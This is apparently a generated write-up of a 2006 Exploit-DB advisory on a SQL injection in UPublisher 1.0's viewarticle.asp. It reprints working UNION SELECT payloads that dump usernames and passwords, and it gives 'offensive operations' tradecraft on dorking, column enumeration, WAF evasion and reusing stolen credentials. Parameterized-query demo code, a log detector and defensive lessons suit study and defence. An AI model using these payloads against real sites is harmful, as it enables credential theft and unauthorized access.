UPublisher 1.0 'viewarticle.asp' SQL Injection: A Historical Exploit Deep Dive

What this paper is
This paper details a SQL injection vulnerability found in UPublisher version 1.0. The vulnerability exists in the viewarticle.asp script, specifically within the ID parameter. An attacker can exploit this to inject malicious SQL code, potentially leading to unauthorized access to sensitive data like usernames and passwords from the tblusers table.
Simple technical breakdown
The core of the vulnerability lies in how the web application handles user input for the ID parameter. Instead of properly sanitizing or parameterizing the input, the application directly embeds it into a SQL query. This allows an attacker to break out of the intended query structure and inject their own SQL commands.
The exploit uses a UNION SELECT statement. This SQL technique allows an attacker to combine the results of their injected query with the results of the original, legitimate query. By carefully crafting the UNION SELECT, the attacker can extract data from other tables, such as tblusers, and display it as if it were part of the normal article view.
Complete code and payload walkthrough
The provided source content is not executable code in the traditional sense but rather a description of the vulnerability and an example of the attack vector.
- `http://[target]/[path]//viewarticle.asp?ID=[SQL]`: This is the general URL structure indicating the vulnerable script (`viewarticle.asp`) and the parameter (`ID`) that can be exploited.
  - `[target]` and `[path]` are placeholders the attacker fills in with the host and path needed to reach the vulnerable application.
  - `[SQL]` is a placeholder for the injected SQL code.
- Example: `//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers`:
  - `ID=-1`: This part likely aims to provide a non-existent article ID. By using a value that won't return any legitimate data (like -1), the attacker ensures that the results of their `UNION SELECT` statement will be the primary, if not only, data displayed.
  - `%20`: This is the URL-encoded representation of a space character. Spaces are crucial for separating SQL keywords and column names.
  - `union`: This SQL keyword is used to combine the result sets of two or more `SELECT` statements.
  - `select`: This SQL keyword initiates a query to retrieve data.
  - `0,password,username,0,0,0,0`: These are the columns the attacker wants to retrieve. The `0`s are placeholders. The attacker is guessing the structure of the original query and trying to match the number of columns. They are specifically requesting `password` and `username` from the `tblusers` table. The number of `0`s and the order are critical for the `UNION SELECT` to work, as it must match the number of columns returned by the original query.
  - `from%20tblusers`: This specifies the table from which to retrieve the `password` and `username` columns.
- OR --- `//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers`:
  - This is an alternative example, demonstrating that the attacker might need to adjust the column order or the number of placeholder columns (`0`s) to match the original query's structure. Here, `username` and `password` are requested in a different order, and there are more placeholder `0`s, suggesting a different original query structure.

Mapping list:
- `viewarticle.asp?ID=` -> Vulnerable script and parameter.
- `-1` -> Non-existent ID to ensure injected results are displayed.
- `%20` -> URL-encoded space for SQL syntax.
- `union select` -> SQL command to combine query results.
- `0,password,username,0,0,0,0` -> Columns to extract and placeholders to match original query structure.
- `from tblusers` -> Target table for data extraction.
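The walkthrough above, reproduced as an added example (not code from UPublisher or from the original advisory): the same lookup written with string concatenation and with integer validation plus a bound parameter. SQLite stands in for the real backend, and `tblarticles`, its seven columns and the function names are assumptions; only `tblusers(username, password)` and the payload come from the page.

```python
import sqlite3
from urllib.parse import unquote

# Constructed stand-in schema: the page only names tblusers(username, password).
# tblarticles and its 7 columns are assumed so the page's 7-column payload fits.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblarticles (id INTEGER, title TEXT, body TEXT, "
               "author TEXT, created TEXT, views INTEGER, category INTEGER)")
    db.execute("CREATE TABLE tblusers (username TEXT, password TEXT)")
    db.execute("INSERT INTO tblarticles VALUES (1, 'Hello', 'First post', "
               "'editor', '2006-11-01', 3, 1)")
    db.execute("INSERT INTO tblusers VALUES ('admin', 'constructed-secret')")
    return db

def view_article_concat(db, raw_id):
    """Vulnerable pattern: the ID value is pasted into the SQL text."""
    sql = "SELECT * FROM tblarticles WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def view_article_param(db, raw_id):
    """Hardened pattern: validate as an integer, then bind it as a parameter."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return []  # anything that is not a plain integer is rejected outright
    return db.execute("SELECT * FROM tblarticles WHERE id = ?",
                      (article_id,)).fetchall()

# The ID value from the page's first example, URL-decoded.
PAYLOAD = unquote(
    "-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers")

if __name__ == "__main__":
    db = make_db()
    print("concat:", view_article_concat(db, PAYLOAD))  # tblusers row leaks
    print("param: ", view_article_param(db, PAYLOAD))   # nothing returned
    print("normal:", view_article_param(db, "1"))       # article still served
```

Passing the page's nine-column variant to `view_article_concat` against this seven-column table raises `sqlite3.OperationalError`, which is the column-count constraint the walkthrough describes.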
Practical details for offensive operations teams
- Required Access Level: Typically requires unauthenticated access to the web application. The vulnerability is exposed via a public-facing URL.
- Lab Preconditions:
- A target environment running UPublisher 1.0 or a similarly vulnerable version.
- A web server capable of serving ASP pages (e.g., IIS on Windows).
- A database backend (likely SQL Server, given the ASP context, but could be others) containing the `tblusers` table.
- Network connectivity to the target web server.
- Tooling Assumptions:
- A web browser for manual testing and initial reconnaissance.
- A web proxy like Burp Suite or OWASP ZAP to intercept and modify requests.
- SQL injection specific tools (e.g., sqlmap) can automate the discovery and exploitation of such vulnerabilities, though manual crafting is often necessary for complex scenarios or to bypass basic WAFs.
- A list of common SQL injection payloads and techniques.
- Execution Pitfalls:
- Column Mismatch: The most common failure point. The `UNION SELECT` statement must have the same number of columns as the original query. If the number of `0`s and requested columns doesn't match, the query will fail. This requires enumeration of the original query's column count.
- Database Dialect Differences: The exact syntax for `UNION SELECT` and table/column names might vary slightly between database systems (e.g., SQL Server, MySQL, PostgreSQL). The provided exploit assumes a common syntax.
- Web Application Firewalls (WAFs): Modern WAFs are designed to detect and block common SQL injection patterns like `UNION SELECT`. Obfuscation techniques might be required.
- URL Encoding: Incorrect URL encoding of special characters can break the injection.
- Application Logic: The application might have specific logic that filters or sanitizes input in unexpected ways, even if it's vulnerable.
- Data Not Displayed: Even if the injection is successful, the extracted data might not be displayed on the web page if the application doesn't render all columns or if there are further processing steps.
- Tradecraft Considerations:
- Reconnaissance: Identify the target application and version. Use search engines (dorks) to find potentially vulnerable instances.
- Enumeration: Determine the number of columns in the original query. This can be done by sending `UNION SELECT NULL, NULL, ...` with an increasing number of `NULL`s until the query returns an error or a valid result.
- Data Extraction: Once the column count is known, inject queries to extract specific data like usernames, passwords, or other sensitive information.
- Blind SQL Injection: If data isn't directly displayed, techniques like blind SQL injection (time-based or boolean-based) might be necessary, though this exploit focuses on error-based or out-of-band data leakage.
- Post-Exploitation: If credentials are exfiltrated, attempt to use them to gain further access to the application or underlying systems.
Where this was used and when
- Context: This exploit targets a specific web application called UPublisher, a content management system or publishing platform.
- Year: Published in November 2006. This indicates it was relevant during that period. Exploits from this era often targeted less sophisticated web application security practices.
- Usage: Such vulnerabilities were commonly exploited by attackers to gain unauthorized access to user credentials stored in web application databases. This could lead to account takeovers, data breaches, or further compromise of the web server.
Defensive lessons for modern teams
- Input Validation and Sanitization: Always validate and sanitize all user-supplied input. This includes checking for expected data types, lengths, and character sets.
- Parameterized Queries (Prepared Statements): This is the most effective defense. Use parameterized queries or prepared statements in your database interactions. This separates the SQL code from the data, preventing user input from being interpreted as executable SQL.
- Principle of Least Privilege: Ensure database accounts used by web applications have only the necessary permissions. Avoid granting broad `SELECT *` or administrative privileges.
- Web Application Firewalls (WAFs): Implement and properly configure WAFs to detect and block common attack patterns, including SQL injection attempts. However, WAFs should be a layer of defense, not the sole solution.
- Regular Patching and Updates: Keep all web applications, frameworks, and underlying server software up-to-date with the latest security patches.
- Security Audits and Code Reviews: Regularly audit and review web application code for security vulnerabilities.
- Error Handling: Configure applications to display generic error messages to users and log detailed errors server-side. Avoid revealing database error messages directly to the client, as these can provide valuable information to attackers.
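A detection sketch for the WAF and server-side logging points above, added here as an example and not taken from the original advisory: it flags `viewarticle.asp` requests whose `ID` is not a plain integer, which catches the page's payloads without depending on keyword lists alone. The log layout, paths, status codes and the function name are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests in a simplified "METHOD URI STATUS" layout.
# Paths and status codes are made up; the first payload is the page's own.
SAMPLE_LOG = """\
GET /news/viewarticle.asp?ID=12 200
GET /news//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers 200
GET /news/viewarticle.asp?id=3%20UNION%20SELECT%20NULL,NULL 500
GET /news/default.asp?page=2 200
"""

SQL_WORDS = re.compile(r"\b(union|select|from)\b", re.IGNORECASE)

def flag_requests(log_text):
    """Return (uri, reasons) for each viewarticle.asp request with a bad ID."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 3:
            continue
        # Split by hand: a URI starting with "//" would confuse a URL parser.
        path, _, query = fields[1].partition("?")
        if not path.lower().endswith("/viewarticle.asp"):
            continue
        # parse_qs URL-decodes values, so %20 becomes a space before matching.
        params = parse_qs(query, keep_blank_values=True)
        ids = [v for k, vs in params.items() if k.lower() == "id" for v in vs]
        for value in ids:
            reasons = []
            if not re.fullmatch(r"[0-9]+", value):
                reasons.append("ID is not a plain integer")
            if SQL_WORDS.search(value):
                reasons.append("SQL keyword in ID")
            if reasons:
                findings.append((fields[1], reasons))
    return findings

if __name__ == "__main__":
    for uri, reasons in flag_requests(SAMPLE_LOG):
        print(", ".join(reasons), "->", uri)
```

The integer check is the stronger signal: it is the same allow-list the application should enforce, so it does not depend on recognising any particular SQL keyword.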
ASCII visual (if applicable)
This exploit is a direct manipulation of a web request and its interaction with a backend database. An ASCII diagram can illustrate the flow of data and the point of injection.
```text
+-----------------+      +-----------------+      +-----------------+
| Attacker's      |----->| Web Server      |----->| Database Server |
| Browser/Tool    |      | (IIS + ASP)     |      | (SQL Server)    |
+-----------------+      +-------+---------+      +--------+--------+
                                 |                         ^
                                 | viewarticle.asp?ID=[SQL]|
```
---
## Original Exploit-DB Content (Verbatim)
```text
*******************************************************************************
# Title : UPublisher 1.0 (viewarticle.asp) Remote SQL Injection
Vulnerability
# Author : ajann
# Dork : UPublisher
# Vendor: http://www.superfreaker.com/
*******************************************************************************
###http://[target]/[path]//viewarticle.asp?ID=[SQL]
Example:
//viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
OR ---
//viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-11-12]
```